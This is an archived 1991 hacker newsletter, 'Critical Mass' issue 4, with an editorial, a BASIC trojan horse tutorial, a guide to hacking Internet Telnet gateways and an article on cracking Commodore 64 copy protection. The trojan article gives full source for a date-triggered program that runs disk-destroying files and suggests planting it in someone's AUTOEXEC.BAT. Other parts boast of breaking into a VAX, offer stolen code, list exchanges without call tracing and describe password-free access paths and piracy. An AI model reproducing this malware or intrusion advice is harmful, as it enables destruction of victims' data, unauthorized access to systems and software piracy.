💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › CRITICAL › critical.4th captured on 2022-06-12 at 10:43:33.
-=-=-=-=-=-=-
_____________________________________________________________________________
\~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/
\ Critical Issue # 04 A Technical Text /
\ Mass ~~~~~~~~~~~ File Newsletter. /
\________________________________|____________________________________/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
__________________________
__________ l___________ | ___________l
// \ _______ _____ l|l _____ ______ ___
// /~~~~~~~\_\ l \ l l l|l l l // \ _ l l
// / l [] / ~l l~ l|l ~l l~ // /~~~\_\ / \ l l
<<<< ritical l / l l l|l l l // / / \ l l
\\ \ l < l l l|l l l <<<< / ___ \ l l
\\ \_______/~/ l l\ \ l l l|l l l \\ \____/~/ / / \ \ l l_____
\__________/ l__l \_\ l___l l_l l___l \_______/ /_/ \_\ l_______l
==--> ==-->
____ __ ____ ==--> (02/05/91)
l \ / l ass ==-->
l \ / l __ ______ ______
l \ / l / \ / \ / \ A Technical
l l\ \ / /l l / \ / /~~~~~~ / /~~~~~~ text file newsletter
l l\\ / l l / ____ \ \ ~~~~~~/ \ ~~~~~~/ ~~~~~~~~~~~~~~~~~~~~
l l \\____/ l l / / \ \ ~~~~/ / ~~~~/ / Issue: 4
l l l l /_/ \_\ /~~~~ / /~~~~ /
~~~~ ~~~~ ~~~~~~ ~~~~~~
_____________________________________________________________________________
l Writters l Special thanks to.... l
l__________________________l________________________________________________l
l l l
l The Beaver l Old members of C.C.C, SF, Copy Cat, etc. l
l Shadow l Also, Abigail, The Nut-Kracker, Robo, Mark l
l ElfInMagic l , All Members Of The SAOO! l
l__________________________l________________________________________________l
DISCLAIMER -----------> EXPERIMENT AT YOUR OWN RISK!
----------------------------
The editor and writters of this 'techincal newsletter' will take
no responiblities for injuries or procescutions due too the
information in this news letter. Experiment at your own risk,
because editors and writters will NOT be held responsible.
ARTICLES AND QUESTIONS WANTED!
------------------------------
If you wish to submit a article to 'Critical Mass', please do!
The whole newsletter depends on YOU the reader. No article is
to big or to small. Normal 'non-welcome' subjects, such as,
phreaking, hacking, credit card surfing, etc, etc, are welcome
here!! Subject can be from 'how to rip off types of coke machines'
to 'how to build a atomic bomb for spare car parts'. Also,
if you have ANY questions, ideas, comments, insults, donations,
theroys, hypothesis, etc, etc, please E-mail the writer of the
aritcle you read OR 'The Beaver' in one of two of these fine,
fine BBS's!........
The Reactor BBS -> (904)878-1736
Warriers Retreat -> (904)422-3606
/\
/\/\ Chief Editor Brought To You By
/\/\/\ ~~~~~~~~~~~~~ Members of
/\/\/\/\ The Beaver SAOO!
/\/\/\/\/\
/\/\/\/\/\/\
/\/Critical\/\ <S>ilicon
\/\/\Mass/\/\/ <A>luminum
\/\/\/\/\/\/ <O>xidation
\/\/\/\/\/ <O>ganization
\/\/\/\/
\/\/\/
\/\/
\/
______________________________________________________________________________
l This issue contains articles of the following..... l
l____________________________________________________________________________l
l l
l I. Editorial written by 'The Beaver'. l
l II. BASIC Host For Trojans, by 'ElfInMagic' l
l III. Hacking The Internet Part One!, by 'The Beaver' l
l IV. Kracking; Overveiw - Into - 'Shadow' l
l____________________________________________________________________________l
______________________________________________________________________________
l Todays Topic Is....... l
l Written By The Beaver l
l____________________________________________________________________________l
We as you may (or your REALLY stupid people) may not know, the US is
at war. You may or may not have people you know fighting over there, so we
here in the hacking realm decided to put our part for you. If you have friends
or love ones there, you can send them mail faster than anyone you know know.
While hacking on a VAX I broke into, I got a hold of a message from east
Florida and it states that GE is allowing the use of there network to send
messages to loves one at war. You must supply some information though. Like
the following......
Name and Rank
Social Security Number
Unit or Ship
If you don't supply this information correctly, it will be sent to
the wrong person. What happens is that you send a message, it is then put
into envolopes and sealed. After that it is given to the person you desire.
It is a hell of alot fast than standard US mail! Just call.......
(904)668-7610
......and supply the information given. At the 'U#' prompt, just
press return. If you don't like the war, please don't send out anti-war
shit. Its bad enough that they have to be there without your shit.
On a lighter subject, heres a little information named 'Dungeon
Master' gave me, that I SHOULD have known a LONG time ago. All you wargamers
out there will be happy to here that the call tracing or the redial last
number features or NOT avalible for the following prefixxes and exchanges in
the TLH area!!!!!!!!!!
421
488, 487
893-0000 thru 893-6999
893-9100's thru 668-12XX
You don't beleive me? Look on page 11 in the white pages! Also, there
are a few things that happens in call tracing, you must understand. When a
call is sucessfully traced, the fone company doesn't give the number to you
but rather the law enforcement agency handles the task for you.
On another subject, in Critical Mass#2, I talk about hacking InterAct.
All that information should be disregarded. The system was taken down. You
didn't miss much. It was running on a IBM3090 series.
Included with this text is some code that is (or should I say was)
'confidental'. It is 'C' code and I figured some of you may be intrested to
see exactly how UNIX works. This is part of the inner making. Download if
you please and have intrest. It is under the name 'Criticalinfo.txt'. I won't
tell what system it came from! Have fun and happy hacking to ya!
____________________________________
I I
I Using Basic in Trojan Horses 1 I
I I
I By: ElfInMagic I
I__________________________________I
This is the premier of a new section in Critical Mass called
"Using Basic in Trojan Horses"... I will basically will be giving you some
basic source code, and explaining how it works... Well let's get started with a
simple little program that will destroy whatever disk it is located on if the
date is equal or later than the one you specified.
10 CLS
20 CLOSE #1:CLOSE #2
30 KEY OFF
40 MONTH$=LEFT$(DATE$,2) 'This gets the current Month
50 DAY$=MID$(DATE$,4,2) 'This gets the current Date
60 YEAR$=RIGHT$(DATE$,2) 'This gets the current Year
70 MONTH=VAL(MONTH$) 'This changes Month$ to Month
80 DAY=VAL(DAY$) 'This changes Day$ to Day
90 YEAR = VAL(YEAR$) 'This changes Year$ to Year
100 NEWDATE$="01/01/92" 'You change this to any date you
' want to ...
110 NEWMONTH$=LEFT$(NEWDATE$,2) 'Gets the Month to check
120 NEWDAY$=MID$(NEWDATE$,4,2) 'Gets the Day to check
130 NEWYEAR$=RIGHT$(NEWDATE$,2) 'Gets the year to check
140 NEWMONTH=VAL(NEWMONTH$) 'Changes NewMonth$ to NewMonth
150 NEWDAY=VAL(NEWDAY$) 'Changes NewDay$ to NewDay
160 NEWYEAR=VAL(NEWYEAR$) ' Changes NewYear$ to NewYear
170 IF MONTH >NEWMONTH AND YEAR >=NEWYEAR THEN GOTO 210
180 IF MONTH = NEWMONTH AND DAY=>NEWDAY AND YEAR = NEWYEAR THEN GOTO 210
190 IF YEAR > NEWYEAR THEN GOTO 210
200 END
210 SHELL "CD >FAKE.DAT" 'Places current sub directory in a 'file
220 OPEN "FAKE.DAT" FOR INPUT AS #1 'Opens file for use
230 LINE INPUT #1, DRIVE$ 'Gets then Directory you are in
240 DRIVE$=LEFT$(DRIVE$,2) 'Finds the Drive currently on
250 IF DRIVE$=UCASE$(DRIVE$)
260 IF DRIVE$="A:" THEN SHELL"REN X001.BIN KILLA.COM": SHELL"KILLA.COM"
270 IF DRIVE$="B:" THEN SHELL REN X002.BIN KILLB.COM": SHELL"KILLB.COM"
280 IF DRIVE$="C:" THEN SHELL REN X003.BIN KILLC.COM": SHELL"KILLC.COM"
290 IF DRIVE$="D:" THEN SHELL REN X004.BIN KILLD.COM": SHELL"KILLD.COM"
300 IF DRIVE$="E:" THEN SHELL REN X005.BIN KILLE.COM": SHELL"KILLE.COM"
310 END
Basically all this piece of code does is it will check the current date of
the system, and if the date is after or on the date you specify, it will
destroy whichever drive it is being run from... So you could add this to
someone's "AutoExec.Bat" file, and when the date matches or is after the one
you specify, it will destroy the drive it is being run from... For this to run
correctly, you must use the information in Critical Mass issue #1, and compile
the ".COM" files needed to destroy each of the above disks... Then rename them
to the appropriate file name...
For this program to run correctly, you need to compile it, so it will run
directly from DOS... If you do not have a Basic Compiler then you will need to
run it with the command "Basica DateChek.Bas", and change line 310 to "SYSTEM".
The next issue of this text will contain a text file with a source code on
using command line attributes in basic, and how to add them to this program...
_____________________________________________________________
I I
I Any questions on this may be sent to "ElfInMagic" via the I
I Warriors Retreat I
I___________________________________________________________I
Also please feel free to ask any questions on how to do something like
this in Basic... If I do not know, I will be happy to find out for you...
____________________________________________
l l
l Hacking Internet, Part I l
l By The Beaver l
l__________________________________________l
This is the first of a series of articles that will pretain to
the hacking of 'Internet'. Yes, this is the same network that a worm hit in
1987. Actually, this artical will talk more along the lines of hacking the
Telnet systems, which in turn, you can get to other networks like ARPAnet
and CHAOSnet, and much more. First off, I would like to go into finding
a Telnet you can use. On VAX's under VMS, there is usually a service called
'TELNET'. This is you gateway to the internet and other networks. Usually,
these networks go to everything from White Sands Missle Range to Small
colleges. Sense most Telnet gateways are only accessable off VAX's (or at
least around here)
Ok, first off, lets say you have a access to the Telnet gateway,
it does you no good if you have nowhere to goto! If you ask for help most
of the time, you will get very little. First, I have noted two different
Telnet access software types. One looks like this (Off of only VAX's that I
have seen so far.....)
TELNET>
The Other......
Telnet>
I know, this appears to be no big deal, but the first on operates
a little different (The one on VAX's). For one this, the help menu is a
hell of alot better and more detailed. The secound, I have only seen off of
networks, and not in VAX's. Besides the help differences, they operate a little
different two. You see, to connect to another computer though telnet, you must
give it a address. On a VAX (the first one), you would simply type the address
itself..... For example, the address is 'I.LOVE.TO.HACK'. You would do this...
TELNET> I.LOVE.TO.HACK
Trying....... (This is a message telling you it is attempting to connect to
the remote system)
On the other it would be.....
Telnet> o I.LOVE.TO.HACK
The 'o' stands for 'open' a address. Simple enough, lets move on.
Now the information I have given you does you no good so far, if you have no
addresses. Heres how to get TONS of address........ We will use the telnet
though a VAX to make it simple (just keep in mind what I said above). The
address is 'NIC.DDN.MIL'. The 'DDN' stands for Defense Dept. Network, and
the 'MIL'. Sure you can guess. Don't worry, this system is non-classified
and can be accessed 'anonymously', meaning in this case, no password or
username is required. The system is running on a DEC2060 on TOPS-20, for you
more experianced hackers out there..... So you would type......
TELNET>NIC.DDN.MIL
Trying........ Connected to (Blah, blah, blah)
You will then be connected to the system in Washington, I beieve,
Im not sure. On this system, you can read bulletins about security on the
internet, and often get a few pointers on hacking! (This would be the first
option on the menu, or 'NIC'<CR>. Lets go on though with the article though.
Do read it though. It is VERY intresting at times. Now you have one address.
With this address you can get tons but typing this at the '@' prompt.
WHOIS (What ever you what to get a address to, for example)
WHOIS WHITE <CR>
When you type this though, you have to wait a LLOOONNGG time for
it to put up all things about 'white'. It will not only pull up addresses,
but in many cases, network uses also! Names, fone numbers and all! One of
the first thing it will pull is 'White sands missle range' the last thing it
will get is a 'Wyoma E. Smith', or a netuser. Some users work form the
pentagon, other Eglins Air Force Base. Now most of these systems are non-
classified, but from what I understand, it is possible to find classifed
systems also. The odds that you could break into a classified, or even find
one is about null. Now after 5 to 10 min of searching its database, it will
give a BIG list (Im not kidding about the time). Here is a example line.......
U.S Air Force (APDS-II-OSO33) APDS-II-OSO33.AF.MIL 26.6.0.66
^ ^ ^ ^
l l l l
Name Handle Address Address
(Usually Internet)
1. 2. 3. 4.
Worry only about the name and addresses, for now. Now this is a
good example, but most of the time it is a little easier to read that this.
After we got all the addresses we wanted, we would then leave NIC.DDN.MIL
by typing 'quit'. From there we would goto the 'TELNET>' prompt again. Now
lets say we want to connect the system above, we would try to determine what
the addresses is. No at number 3, note the '-' in the name. These will not
work on internet. So we look at the last dash and copy everything too the
right, or 'OSO33.AF.MIL'. Odds are this address will work fine at the telnet
prompt. So to connect to this system, you would type.......
TELNET>OSO33.AF.MIL <CR>
Trying.......
Now one of few things might happen. You might get 'Trying.....Unable
To Connect To Remote Host In Time Out Period', or something like that. This
is not bad, try is again a few times. If it doesn't connect, either the system
is down, the line is bad, or just wants no one from your area to connect to
that system, which I doubt ever happens. Just try again at a later time.
If it says 'Internet host unknown', we go back up too the example above.
Look at number 4. Try that at the telnet. If you get the same
you might have trouble accessing that system. You type that in just as it
appears. Most of the addresses I and Shadow have found connect to SUN's.
They seem to like them a bunch. This should cover the basics of hacking
internet. For you people that use 'internet' on a VAX, there is sometimes a
'anonymous' list for internet. It will give you addresses to systems that
you can connect to and type at the username prompt 'guest' and the password
'anonymous', usually. GET IT! It is VERY handy! Also, Another way to get
addresses off a VAX without going though TELNET, is at your VMS prompt,
type 'whois (ya no what goes here)'. If it has telnet abilities, you will
get a list. This doesn't work from a network telnet, only on VAX telnet's.
Now I am going to tell you something that some hackers in TLH area might
not like (mostly my brothers in the SAOO). Heres how YOU can access telnet
and hack on it. No password or username is required. I take it will all
know how to use FIRN and UFnet (refer to CM#1 and 2). Do this at the UFnet
'#' prompt. Type either
call 200
or
call 202
Which every you prefer. Now connect to 'ds2100', like thus.....
Local> c ds2100 <CR)
You will connect to Telnet, and the rest (getting addresses, and
such) is up too YOU. I have told you how to do it so it should be no problem.
This telnet operates like the secound example given about the differences in
telnets. In you have any questions about part on, you know where too e-mail
me. On Warriers Reteat or The Reactor BBS. Also, Shadow, as usual, has
played a great role in the hacking of this network. Thanx again........ Part
two will go into more VAX stuff, one topic I no that will be discussed will
be 'who to get usernames and passwords of internet uses, using the intruder
log file you YOUR advantage as a trojan horse!'. Don't miss it. Im sure you
won't! Till then, Chow
---==<Beaver>==---
Due to the loss of the original artical, I will now re-type it (to the
best of my non-static memory). The good part is that now I can add a second
part to the artical covering the basics of using a sector and format editor.
The machine of choice is a Commodore 64. This artical makes no attempt
to present it's self as a full and complete guide to cracking, I will,
however, give you the title of a book that makes a great refrence work.
The title: Inside Commodore DOS The authors: Richard Immers, Ph.D. and
Gerald G. Newfeld, Ph.D. If you own a 1541 and not this book; buy the book!
It's a real help!
To those who want to review the useages of sector and format editors,
procide to appendix A (an overview), B (sector editors) and C (format editors)
If you have any questions about this or other cracking techniques, I may
be contacted at Warrior's Retreat (P#:(904)422-3606 username: Shadow) or
through The Beaver. About the spelling, I know and don't CARE!!!
The techniques discribed here are for use with a Commodore 64, but should
hold true with any machine. The techinics discribed here should hold true with
any machine .
- Shadow
Copy protection:
Their are three popular methods of copy protection. One, embeded errors;
two, data encription; and three, manual protection. The first two methods are
somewhat simple to overcome, the third however, does present problems. We
will cover these methods one at a time and in order. However, first their are
definitions to be made:
One, Embeded Errors:
This one is the easiest to defeat, all one has to do is come
up with a comptent nibler (bit copier) and cut it loose. This
should make a functional copy. The method behind the madness
of loading down a disk with errors is that earlier in the
strugle between pirates and developers, the developers belived
that pirates would not be able to easly copy these errors and
become discuraged. The pirates rose to the ocation and came
up with the bit coping system. They also came up with the idea
of paramaters for these bit copiers. A parementer is a map of
errors that a nibbler uses when it copies a disk.
Two, Data Encription:
This one also has advantages and was the next step in the
battle. It uses such techniques as half-tracks, checksums,
and encodeing. It is at it's best when coupled with manual
protection, otherwise it has little valule.
Three, Manual protection:
This one ranges from hard to easy and all points between.
Manual protection's ease of overcome is directly realted to
either if it is coupled with data encription or it's actual
position on the disk. I'll explain. If the data base the
program uses for valadation is part of the same program that
actualy does the vadalation then the job is much easier.
(See below for reasons)
Steps to cracking preperation:
First:
Scan the disk for errors. If errors are there, make a nibble
copy and run the copy. Make sure that it behaves exactly like the
original. If it doesn't then go back and figure out why. This may
be done by making an error map of the original and comparing it to
the errors present on the copy. If they are the same, then you have
a valid copy. With this copy, the sysem should work. Keep in mind,
if your equipment can run this softwear then your system can
duplicate it. If your system can read the stuff, then it can WRITE
it!
If their are no errors, STILL make a nibble copy! Better safe
than sorry.
Second:
Establish the order of execution of the programs within the
softwear and see if you can figure out just how the softwear is
protected. A good rule of thumb here is: If your drive does a lot
of thrashing and head banging then it is most likely error protected.
If the system is manual protected, then this will be quite apparent.
It'll ask for mabey a number on a wheel or some symbols or "What-is-
on-line-xx-of-page-xx?"...
Third:
Overcoming softwear protection is DIRECTLY related to the
method of protection used. Not only this, but just how the
method(s) are interelated. An example: A peice of softwear might
be error protected AND manual protected WHERE the keywords are
ENCODED!! Needless to say, this configuration would suck to the
extreme.
Now for the good stuff...
Cracking the wearz:
Protection Method of defeat
==================== ========================================
Error protection A good solid nibble copier
Encription Also a good nibbler
Manual protection Now it gets tricky...
Straight manual protection:
In manual protection you must search for a keyword. This would be
a responce that you know to be one of the answers to the verification
prompts. If you have no search function, you will have to chain
thru all the programs, in the order that they are loaded, until you
find the table of keywords.
When you find the words used, you change them all to a single word or
character string (such as dec 13 (hex 0C) for return) and try it.
If it doesn't work, this could mean that it has a checksum. A
checksum is a number that is the sum of all the characters added. If
this number doesn't check out with the data present... CRASH!
To overcome a checksum one can do one of two things. First, find an
entreable character or string of characters that add up to the
checksum or change the checksum to your preference. The first is the
easiest.
Encoded manual protection:
One must keep in mind that the keywords MUST be entreable from the
keyboard. If it wern't then the prot. scheme would not be feasable.
the entrable keys fall between asc 32 and asc 128. Then the fun
begins. You must determin the method of encription (ie. crack the
code). This is the next to the most dificult thing to do.
Last ditch effort:
If you can't undermine the copy protection scheme in any of the above
indirect methods, their is one last thing that can be done. This is
to load the system, disassimble it, and redirect the program around
the security check aeras. This is THE *MOST* dificult method, but
it is the best and absulitly sure to work if you can do it.
In closing, I hope that you find this useful. If there are any questions,
comments, complaints or mistakes feel free to contact me. As above, I may be
E-Mailed at The Warriors Retreat (904)422-3606, Username: Shadow. Thanks and
Happy Cracking.
- Shadow
Author's Note:
In the intrest of hacking everywhere, I hereby place my self in the "Roll
Call". The following is information for that use. I urge you to do the same
if you are a hacker. We GOTTA orginize!
Handle: Shadow
Location: Warrior's Retreat
Machine of preference: Amiga, Commodore 64, IBM, Apple, Color Computer
(And VAX when I'm Lucky...)
Group: Silicon Aluminum Oxidation Orginization
Associates: The Beaver & Abigail
Experence: Network hacking ; 4 months
Cracking and hacking in general ; 7 years
Programming: 7 Years
(Languages: Basic, RPG [Ugghh!], C)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Appendix A: An overview (Of disk Operation)
A disk works like a tape recorder. In fact, a disk is made of the same
materal. The bonous, ofcorce, is speed of access. Sence the sucker spins
(usualy at about 300rpm [5.25" Floppy] and the read/write head moves it can
locate and read information quickly and effecniently.
Now, the disk structure is made up of tracks and sectors. A track is a
circular band that streches around the disk's surface. Sectors are small
segments that make up tracks. Now if you look at a disk, you can't tracks or
sectors. This is beacuse that these structures are made up of microscopic
magnetic filiments. The orentation of their poles denote whether the bit that
it represents is 1 or 0 (that is on or off).
Note on double sided drives:
A double sided drive is much like a single sided one. The difrence is
ofcorse the manor in whitch it accesses the drive. A double sided drive has
two read/write heads one above eachother. It both sides of the disk at the
same time. Observe:
Single sided drive: Read/Write head
/
|||||------===
---------------------- <- Disk
Double sided drive: Read/Write head
/
|||||------===
---------------------- <- Disk
|||||------===
\
Read/Write head
This (for a double sided drive) means that their is a a new structure:
The cylender. A cyndler is a set of tracks that occur one above eachother.
This allows both more disk space and faser access.
Now, their is only one thing that remains. As a rule, a disk will write
data to sectors that are about 10 sectors distant. This is done for speed.
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Appendix B: Sector Editors
Basicly all sector editors will read a sector as a chunk of data, and
allow you to edit it. Mostly they will allow editing in either HEX or DEC
format. After editing, it will allow you to write it back to the disk
When you get your sector editor, you should practice with it on a test
disk. The reason is that a sector editor bypasses all safty functions within
a drive's operating system, and you could wipe out a program's data.
When possible, it is best to get a sector editor with capabilities to
generate errors.
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Appendix C: Format Editors
A format editor is a system whitch can generate errors for a full track.
They are also cabeable of changeing critical header information and disk
checksums. Best to find one that is intergrated with a sector editor and
possibly a copy system. I use (for my C64) either Di-sector3.0 or Renegade2.0
These are good solid systems. If you have a better version of either of
these systems for a Commodore 64, please tell me.
End of File.
_____________________________________________
l l
l Letters and Replies l
l___________________________________________l